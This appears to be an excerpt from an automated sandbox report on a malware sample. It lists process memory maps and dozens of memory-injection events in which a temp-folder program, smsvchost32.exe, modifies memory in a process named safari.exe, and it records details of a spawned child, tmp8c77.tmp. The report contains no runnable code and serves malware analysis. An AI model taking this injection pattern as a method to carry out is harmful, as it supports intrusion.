| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Private Memory | rw |
|
|
|
- |
| safari.exe | 0x000c0000 | 0x000d6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00403fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00427fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | rx |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00510fff | Private Memory | rx |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00537fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x005fbfff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x00700fff | Private Memory | rx |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00710fff | Private Memory | rx |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00987fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000990000 | 0x00990000 | 0x00b10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x01f1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0213ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x0218ffff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x70020000 | 0x7003cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x70b10000 | 0x70b84fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x745e0000 | 0x74671fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x77640000 | 0x7775efff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed10000 | 0x7ed10000 | 0x7ee0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee10000 | 0x7ee10000 | 0x7ee32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x410000, size = 98304 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510000, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500000, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500005, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500006, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500007, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500008, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500009, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500010, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500011, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500012, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500013, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500014, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500015, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500016, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500017, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500018, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500019, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500020, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500021, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500022, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500023, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500024, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500025, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500026, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500027, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500028, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500029, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500030, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500031, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500032, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500033, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500034, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500035, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500036, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500037, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500038, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500039, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50003a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50003b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50003c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b0, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b1, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b2, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b3, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b4, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x520000, size = 98304 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710000, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700000, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700005, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700006, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700007, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700008, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700009, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700010, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700011, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700012, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700013, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700014, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700015, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700016, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700017, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700018, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700019, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700020, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700021, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700022, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700023, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700024, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700025, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700026, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700027, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700028, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700029, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700030, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700031, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700032, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700033, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700034, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700035, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700036, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700037, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700038, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700039, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70003a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70003b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70003c, size = 1 |
|
1 |
Process #9: tmp8c77.tmp
266
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp |
| Command Line | "C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp" --reinstall |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:29, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe6c |
| Parent PID | 0xdb0 (c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E68
0x
E64
0x
E5C
0x
928
0x
B70
0x
678
0x
83C
0x
F04
0x
838
0x
AC8
0x
AD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| tmp8c77.tmp | 0x00400000 | 0x0043efff | Memory Mapped File | rwx |
|
|
|
|
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x00750fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x00761fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x00771fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00781fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x00793fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007b0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007c0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007d8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
